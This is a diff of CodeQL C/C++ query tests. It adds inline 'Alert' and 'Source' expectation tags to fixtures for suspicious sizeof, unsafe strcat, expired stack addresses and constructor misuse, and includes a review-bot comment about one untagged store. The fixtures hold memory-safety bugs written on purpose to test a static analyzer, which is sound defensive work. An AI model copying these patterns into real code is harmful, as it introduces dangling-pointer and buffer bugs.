+++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/test.cpp @@ -3,21 +3,21 @@ typedef unsigned int size_t; void *memcpy(void *destination, const void *source, size_t num); void f1(char s[]) { - int size = sizeof(s); // BAD + int size = sizeof(s); // BAD // $ Alert // s is now a char*, not an array. // sizeof(s) will evaluate to sizeof(char *) int size2 = sizeof(s[0]); // GOOD } void f2(char s[10]) { - int size = sizeof(s); // BAD + int size = sizeof(s); // BAD // $ Alert int size2 = sizeof(s[0]); // GOOD } typedef char myarray[10]; void f3(myarray s) { - int size = sizeof(s); // BAD + int size = sizeof(s); // BAD // $ Alert int size2 = sizeof(s[0]); // GOOD } @@ -28,7 +28,7 @@ struct container }; void f4(container *s) { - int size = sizeof(s); // (dubious) + int size = sizeof(s); // (dubious) // $ Alert int size3 = sizeof(s->ptr); // GOOD int size2 = sizeof(s->array); // GOOD } @@ -42,7 +42,7 @@ void f5(container *s) { void f6(container *s) { container t; - memcpy(&t, s, sizeof(s)); // BAD + memcpy(&t, s, sizeof(s)); // BAD // $ Alert } void f7(container *s) { @@ -55,5 +55,5 @@ class myClass {}; typedef myClass *myClassPtr; void f8(const myClassPtr s[]) { - int size = sizeof(s); // BAD + int size = sizeof(s); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.c b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.c index ea723e1e0f55..efadee92900b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.c 
@@ -19,7 +19,7 @@ void f(void) { output4[0] = '\0'; strcat(output1, str1); strcat(output2, str1); - strcat(output3, str2); // Bad, as str2 gets reassigned - strcat(output4, str3); // Bad, as str3 gets fiddled with + strcat(output3, str2); // Bad, as str2 gets reassigned // $ Alert + strcat(output4, str3); // Bad, as str3 gets fiddled with // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.qlref index 9790cddebab5..7f1a1cf35f2d 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UnsafeUseOfStrcat/strcat.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/UnsafeUseOfStrcat.ql +query: Likely Bugs/Memory Management/UnsafeUseOfStrcat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected index 858dbea59321..bf50722ec86b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected 
@@ -1,3 +1,31 @@ +#select +| test.cpp:15:16:15:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:15:16:15:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | +| test.cpp:24:16:24:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:24:16:24:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | +| test.cpp:58:16:58:16 | Load: p | test.cpp:52:3:52:13 | Store: ... = ... | test.cpp:58:16:58:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:51:36:51:36 | y | y | test.cpp:52:3:52:13 | Store: ... = ... | this store | +| test.cpp:73:16:73:16 | Load: p | test.cpp:68:3:68:13 | Store: ... = ... | test.cpp:73:16:73:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:62:7:62:7 | x | x | test.cpp:68:3:68:13 | Store: ... = ... | this store | +| test.cpp:98:15:98:15 | Load: p | test.cpp:93:3:93:15 | Store: ... = ... | test.cpp:98:15:98:15 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:92:8:92:8 | s | s | test.cpp:93:3:93:15 | Store: ... = ... | this store | +| test.cpp:111:16:111:16 | Load: p | test.cpp:106:3:106:14 | Store: ... = ... | test.cpp:111:16:111:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:102:7:102:7 | x | x | test.cpp:106:3:106:14 | Store: ... = ... | this store | +| test.cpp:161:16:161:17 | Load: p1 | test.cpp:136:3:136:12 | Store: ... = ... | test.cpp:161:16:161:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:136:3:136:12 | Store: ... = ... | this store | +| test.cpp:162:16:162:17 | Load: p1 | test.cpp:137:3:137:16 | Store: ... = ... 
| test.cpp:162:16:162:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:137:3:137:16 | Store: ... = ... | this store | +| test.cpp:164:16:164:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:164:16:164:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | +| test.cpp:165:16:165:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:165:16:165:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | +| test.cpp:166:17:166:18 | Load: p2 | test.cpp:140:3:140:16 | Store: ... = ... | test.cpp:166:17:166:18 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:140:3:140:16 | Store: ... = ... | this store | +| test.cpp:167:16:167:17 | Load: p1 | test.cpp:141:3:141:15 | Store: ... = ... | test.cpp:167:16:167:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:141:3:141:15 | Store: ... = ... | this store | +| test.cpp:168:17:168:18 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:168:17:168:18 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | +| test.cpp:170:16:170:17 | Load: p3 | test.cpp:144:3:144:12 | Store: ... = ... | test.cpp:170:16:170:17 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:144:3:144:12 | Store: ... = ... | this store | +| test.cpp:171:17:171:18 | Load: p3 | test.cpp:145:3:145:16 | Store: ... = ... 
| test.cpp:171:17:171:18 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:145:3:145:16 | Store: ... = ... | this store | +| test.cpp:172:18:172:19 | Load: p2 | test.cpp:146:3:146:15 | Store: ... = ... | test.cpp:172:18:172:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:146:3:146:15 | Store: ... = ... | this store | +| test.cpp:173:18:173:19 | Load: p2 | test.cpp:147:3:147:19 | Store: ... = ... | test.cpp:173:18:173:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:147:3:147:19 | Store: ... = ... | this store | +| test.cpp:174:18:174:19 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:174:18:174:19 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | +| test.cpp:175:16:175:17 | Load: p1 | test.cpp:148:3:148:18 | Store: ... = ... | test.cpp:175:16:175:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:148:3:148:18 | Store: ... = ... | this store | +| test.cpp:177:14:177:21 | Load: access to array | test.cpp:151:3:151:15 | Store: ... = ... | test.cpp:177:14:177:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:151:3:151:15 | Store: ... = ... | this store | +| test.cpp:178:14:178:21 | Load: access to array | test.cpp:152:3:152:19 | Store: ... = ... | test.cpp:178:14:178:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:152:3:152:19 | Store: ... = ... | this store | +| test.cpp:179:14:179:21 | Load: access to array | test.cpp:153:3:153:18 | Store: ... = ... 
| test.cpp:179:14:179:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:153:3:153:18 | Store: ... = ... | this store | +| test.cpp:180:14:180:19 | Load: * ... | test.cpp:154:3:154:22 | Store: ... = ... | test.cpp:180:14:180:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:154:3:154:22 | Store: ... = ... | this store | +| test.cpp:181:13:181:20 | Load: access to array | test.cpp:155:3:155:21 | Store: ... = ... | test.cpp:181:13:181:20 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:155:3:155:21 | Store: ... = ... | this store | +| test.cpp:182:14:182:19 | Load: * ... | test.cpp:156:3:156:25 | Store: ... = ... | test.cpp:182:14:182:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:156:3:156:25 | Store: ... = ... | this store | +| test.cpp:239:17:239:17 | Load: p | test.cpp:234:3:234:13 | Store: ... = ... | test.cpp:239:17:239:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:232:7:232:7 | x | x | test.cpp:234:3:234:13 | Store: ... = ... | this store | +| test.cpp:268:17:268:17 | Load: p | test.cpp:263:3:263:13 | Store: ... = ... | test.cpp:268:17:268:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:260:7:260:7 | x | x | test.cpp:263:3:263:13 | Store: ... = ... | this store | edges | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:14:3:14:9 | Call: call to escape1 | | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:19:3:19:9 | Call: call to escape1 | 
@@ -68,31 +96,3 @@ edges | test.cpp:238:3:238:9 | Call: call to escape2 | test.cpp:239:17:239:17 | Load: p | | test.cpp:263:3:263:13 | Store: ... = ... | test.cpp:267:3:267:9 | Call: call to escape3 | | test.cpp:267:3:267:9 | Call: call to escape3 | test.cpp:268:17:268:17 | Load: p | -#select -| test.cpp:15:16:15:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:15:16:15:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | -| test.cpp:24:16:24:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:24:16:24:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | -| test.cpp:58:16:58:16 | Load: p | test.cpp:52:3:52:13 | Store: ... = ... | test.cpp:58:16:58:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:51:36:51:36 | y | y | test.cpp:52:3:52:13 | Store: ... = ... | this store | -| test.cpp:73:16:73:16 | Load: p | test.cpp:68:3:68:13 | Store: ... = ... | test.cpp:73:16:73:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:62:7:62:7 | x | x | test.cpp:68:3:68:13 | Store: ... = ... | this store | -| test.cpp:98:15:98:15 | Load: p | test.cpp:93:3:93:15 | Store: ... = ... | test.cpp:98:15:98:15 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:92:8:92:8 | s | s | test.cpp:93:3:93:15 | Store: ... = ... | this store | -| test.cpp:111:16:111:16 | Load: p | test.cpp:106:3:106:14 | Store: ... = ... | test.cpp:111:16:111:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:102:7:102:7 | x | x | test.cpp:106:3:106:14 | Store: ... = ... | this store | -| test.cpp:161:16:161:17 | Load: p1 | test.cpp:136:3:136:12 | Store: ... = ... 
| test.cpp:161:16:161:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:136:3:136:12 | Store: ... = ... | this store | -| test.cpp:162:16:162:17 | Load: p1 | test.cpp:137:3:137:16 | Store: ... = ... | test.cpp:162:16:162:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:137:3:137:16 | Store: ... = ... | this store | -| test.cpp:164:16:164:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:164:16:164:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | -| test.cpp:165:16:165:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:165:16:165:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | -| test.cpp:166:17:166:18 | Load: p2 | test.cpp:140:3:140:16 | Store: ... = ... | test.cpp:166:17:166:18 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:140:3:140:16 | Store: ... = ... | this store | -| test.cpp:167:16:167:17 | Load: p1 | test.cpp:141:3:141:15 | Store: ... = ... | test.cpp:167:16:167:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:141:3:141:15 | Store: ... = ... | this store | -| test.cpp:168:17:168:18 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:168:17:168:18 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | -| test.cpp:170:16:170:17 | Load: p3 | test.cpp:144:3:144:12 | Store: ... = ... 
| test.cpp:170:16:170:17 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:144:3:144:12 | Store: ... = ... | this store | -| test.cpp:171:17:171:18 | Load: p3 | test.cpp:145:3:145:16 | Store: ... = ... | test.cpp:171:17:171:18 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:145:3:145:16 | Store: ... = ... | this store | -| test.cpp:172:18:172:19 | Load: p2 | test.cpp:146:3:146:15 | Store: ... = ... | test.cpp:172:18:172:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:146:3:146:15 | Store: ... = ... | this store | -| test.cpp:173:18:173:19 | Load: p2 | test.cpp:147:3:147:19 | Store: ... = ... | test.cpp:173:18:173:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:147:3:147:19 | Store: ... = ... | this store | -| test.cpp:174:18:174:19 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:174:18:174:19 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | -| test.cpp:175:16:175:17 | Load: p1 | test.cpp:148:3:148:18 | Store: ... = ... | test.cpp:175:16:175:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:148:3:148:18 | Store: ... = ... | this store | -| test.cpp:177:14:177:21 | Load: access to array | test.cpp:151:3:151:15 | Store: ... = ... | test.cpp:177:14:177:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:151:3:151:15 | Store: ... = ... | this store | -| test.cpp:178:14:178:21 | Load: access to array | test.cpp:152:3:152:19 | Store: ... = ... 
| test.cpp:178:14:178:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:152:3:152:19 | Store: ... = ... | this store | -| test.cpp:179:14:179:21 | Load: access to array | test.cpp:153:3:153:18 | Store: ... = ... | test.cpp:179:14:179:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:153:3:153:18 | Store: ... = ... | this store | -| test.cpp:180:14:180:19 | Load: * ... | test.cpp:154:3:154:22 | Store: ... = ... | test.cpp:180:14:180:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:154:3:154:22 | Store: ... = ... | this store | -| test.cpp:181:13:181:20 | Load: access to array | test.cpp:155:3:155:21 | Store: ... = ... | test.cpp:181:13:181:20 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:155:3:155:21 | Store: ... = ... | this store | -| test.cpp:182:14:182:19 | Load: * ... | test.cpp:156:3:156:25 | Store: ... = ... | test.cpp:182:14:182:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:156:3:156:25 | Store: ... = ... | this store | -| test.cpp:239:17:239:17 | Load: p | test.cpp:234:3:234:13 | Store: ... = ... | test.cpp:239:17:239:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:232:7:232:7 | x | x | test.cpp:234:3:234:13 | Store: ... = ... | this store | -| test.cpp:268:17:268:17 | Load: p | test.cpp:263:3:263:13 | Store: ... = ... | test.cpp:268:17:268:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:260:7:260:7 | x | x | test.cpp:263:3:263:13 | Store: ... = ... | this store | 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.qlref index ce6cdee0d867..4075c6c57983 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/UsingExpiredStackAddress.ql \ No newline at end of file +query: Likely Bugs/Memory Management/UsingExpiredStackAddress.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/test.cpp index 616305a8174d..14a10769e144 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/test.cpp @@ -7,12 +7,12 @@ static struct S100 s101; void escape1() { int x; - s101.p = &x; + s101.p = &x; // $ Source } int simple_field_bad() { escape1(); - return *s101.p; // BAD + return *s101.p; // BAD // $ Alert } int simple_field_good() { @@ -21,7 +21,7 @@ int simple_field_good() { } int deref_p() { - return *s101.p; // BAD + return *s101.p; // BAD // $ Alert } int field_indirect_bad() { @@ -49,13 +49,13 @@ int store_argument_value() { } void store_address_of_argument(int y) { - s101.p = &y; + s101.p = &y; // $ Source } int store_argument_address() { int x; store_address_of_argument(x); - return *s101.p; // BAD + return *s101.p; // BAD // $ Alert } void address_escapes_through_pointer_arith() { 
@@ -65,12 +65,12 @@ void address_escapes_through_pointer_arith() { int* p2 = p1 - 1; int* p3 = 1 + p2; p3++; - s101.p = p3; + s101.p = p3; // $ Source } int test_pointer_arith_bad() { address_escapes_through_pointer_arith(); - return *s101.p; // BAD + return *s101.p; // BAD // $ Alert } int test_pointer_arith_good_1() { @@ -90,12 +90,12 @@ int test_pointer_arith_good_2(bool b) { void field_address_escapes() { S100 s; - s101.p = &s.i; + s101.p = &s.i; // $ Source } int test_field_address_escapes() { field_address_escapes(); - return s101.p[0]; // BAD + return s101.p[0]; // BAD // $ Alert } void escape_through_reference() { @@ -103,12 +103,12 @@ void escape_through_reference() { int& r0 = x; int& r1 = r0; r1++; - s101.p = &r1; + s101.p = &r1; // $ Source } int test_escapes_through_reference() { escape_through_reference(); - return *s101.p; // BAD + return *s101.p; // BAD // $ Alert } struct S300 { 
@@ -133,53 +133,53 @@ void escape_through_arrays() { int b2[14][15]; int b3[13][14][15]; - s1.p1 = b1; - s2.p1 = &b1[1]; + s1.p1 = b1; // $ Source + s2.p1 = &b1[1]; // $ Source - s1.p2 = b2; - s2.p2 = &b2[1]; - s3.p1 = b2[1]; - s4.p1 = &b2[1][2]; + s1.p2 = b2; // $ Source + s2.p2 = &b2[1]; // $ Source + s3.p1 = b2[1]; // $ Source + s4.p1 = &b2[1][2]; // $ Source - s1.p3 = b3; - s2.p3 = &b3[1]; - s3.p2 = b3[1]; - s4.p2 = &b3[1][2]; - s5.p1 = b3[1][2]; + s1.p3 = b3; // $ Source + s2.p3 = &b3[1]; // $ Source + s3.p2 = b3[1]; // $ Source + s4.p2 = &b3[1][2]; // $ Source + s5.p1 = b3[1][2]; // $ Source s6.p1 = &b3[1][2][3]; - s1.pp[0] = b1; - s2.pp[0] = &b1[1]; - s3.pp[0] = b2[1]; - s4.pp[0] = &b2[1][2]; - s5.pp[0] = b3[1][2]; - s6.pp[0] = &b3[1][2][3]; + s1.pp[0] = b1; // $ Source + s2.pp[0] = &b1[1]; // $ Source + s3.pp[0] = b2[1]; // $ Source + s4.pp[0] = &b2[1][2]; // $ Source + s5.pp[0] = b3[1][2]; // $ Source + s6.pp[0] = &b3[1][2][3]; // $ Source } void test_escape_through_arrays() { escape_through_arrays(); - int x1 = *s1.p1; // BAD - int x2 = *s2.p1; // BAD - - int* x3 = s1.p2[1]; // BAD - int x4 = *s1.p2[1]; // BAD - int* x5 = *s2.p2; // BAD - int* x6 = s3.p1; // BAD - int x7 = *&s4.p1[1]; // BAD - - int x8 = *s1.p3[1][2]; // BAD - int x9 = (*s2.p3[0])[0]; // BAD - int x10 = **s3.p2; // BAD - int x11 = **s4.p2; // BAD - int x12 = (*s4.p1); // BAD - int x13 = s5.p1[1]; // BAD - - int* x14 = s1.pp[0]; // BAD - int x15 = *s2.pp[0]; // BAD - int x16 = *s3.pp[0]; // BAD - int x17 = **s4.pp; // BAD - int x18 = s5.pp[0][0]; // BAD - int x19 = (*s6.pp)[0]; // BAD + int x1 = *s1.p1; // BAD // $ Alert + int x2 = *s2.p1; // BAD // $ Alert + + int* x3 = s1.p2[1]; // BAD // $ Alert + int x4 = *s1.p2[1]; // BAD // $ Alert + int* x5 = *s2.p2; // BAD // $ Alert + int* x6 = s3.p1; // BAD // $ Alert + int x7 = *&s4.p1[1]; // BAD // $ Alert + + int x8 = *s1.p3[1][2]; // BAD // $ Alert + int x9 = (*s2.p3[0])[0]; // BAD // $ Alert + int x10 = **s3.p2; // BAD // $ Alert + int x11 = 
**s4.p2; // BAD // $ Alert + int x12 = (*s4.p1); // BAD // $ Alert + int x13 = s5.p1[1]; // BAD // $ Alert + + int* x14 = s1.pp[0]; // BAD // $ Alert + int x15 = *s2.pp[0]; // BAD // $ Alert + int x16 = *s3.pp[0]; // BAD // $ Alert + int x17 = **s4.pp; // BAD // $ Alert + int x18 = s5.pp[0][0]; // BAD // $ Alert + int x19 = (*s6.pp)[0]; // BAD // $ Alert } void not_escape_through_arrays() { @@ -231,12 +231,12 @@ static struct S100 s103; void escape2() { int x; s103.p = nullptr; - s103.p = &x; + s103.p = &x; // $ Source } void calls_escape2() { escape2(); - int x = *s103.p; // BAD + int x = *s103.p; // BAD // $ Alert } bool unknown(); @@ -260,10 +260,10 @@ void escape3() { int x; s105.p = nullptr; if(unknown()) { } - s105.p = &x; + s105.p = &x; // $ Source } void calls_escape3() { escape3(); - int x = *s105.p; // BAD + int x = *s105.p; // BAD // $ Alert } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/IncorrectConstructorDelegation.qlref b/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/IncorrectConstructorDelegation.qlref index 193c84e1ab2a..f29596941a18 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/IncorrectConstructorDelegation.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/IncorrectConstructorDelegation.qlref @@ -1 +1,2 @@ -Likely Bugs/OO/IncorrectConstructorDelegation.ql +query: Likely Bugs/OO/IncorrectConstructorDelegation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/test.cpp index ce652cabdace..225f3735a416 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/OO/IncorrectConstructorDelegation/test.cpp 
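Review bot: In `escape_through_arrays`, `s6.p1 = &b3[1][2][3];` is the only store left without a `// $ Source` tag, and `test_escape_through_arrays` never reads `s6.p1`, so no `$ Alert` line checks that escape. If the gap is deliberate, a comment such as `// not read below, so no alert is expected` would say so. Otherwise add a read like `int x20 = *s6.p1; // BAD // $ Alert` and tag the store; whether the query reports that read is an assumption to confirm by running the test. The body of `escape_through_arrays` starts above this hunk.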
@@ -4,7 +4,7 @@ class MyRect public: MyRect() { - MyRect(100.0f, 100.0f); // BAD + MyRect(100.0f, 100.0f); // BAD // $ Alert } MyRect(float _width, float _height) : width(_width), height(_height) @@ -13,7 +13,7 @@ class MyRect MyRect(float _width) { - MyRect(_width, _width); // BAD + MyRect(_width, _width); // BAD // $ Alert } MyRect(int a) : MyRect(10.0f, 10.0f) // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.cpp b/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.cpp index 4b7b61de8cec..2555a6cb842e 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.cpp @@ -53,7 +53,7 @@ struct Base_Virtual_VirtualDtor virtual void VirtualFunction(); }; -struct Base_Virtual_NonVirtualDtor +struct Base_Virtual_NonVirtualDtor // $ Alert { ~Base_Virtual_NonVirtualDtor(); virtual void VirtualFunction(); @@ -65,7 +65,7 @@ struct Base_Virtual_ImplicitDtor virtual void VirtualFunction(); }; -struct Base_Virtual_NonVirtualDtorWithDefinition +struct Base_Virtual_NonVirtualDtorWithDefinition // $ Alert { ~Base_Virtual_NonVirtualDtorWithDefinition(); virtual void VirtualFunction(); @@ -75,7 +75,7 @@ Base_Virtual_NonVirtualDtorWithDefinition::~Base_Virtual_NonVirtualDtorWithDefin { } -struct Base_Virtual_NonVirtualDtorWithInlineDefinition +struct Base_Virtual_NonVirtualDtorWithInlineDefinition // $ Alert { ~Base_Virtual_NonVirtualDtorWithInlineDefinition() { diff --git a/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.qlref b/cpp/ql/test/query-tests/Likely Bugs/OO/NonVirtualDestructorInBaseClass/NonVirtualDestructorInBaseClass.qlref index ff3cecfecc72..9ca3f49140ee 100644 
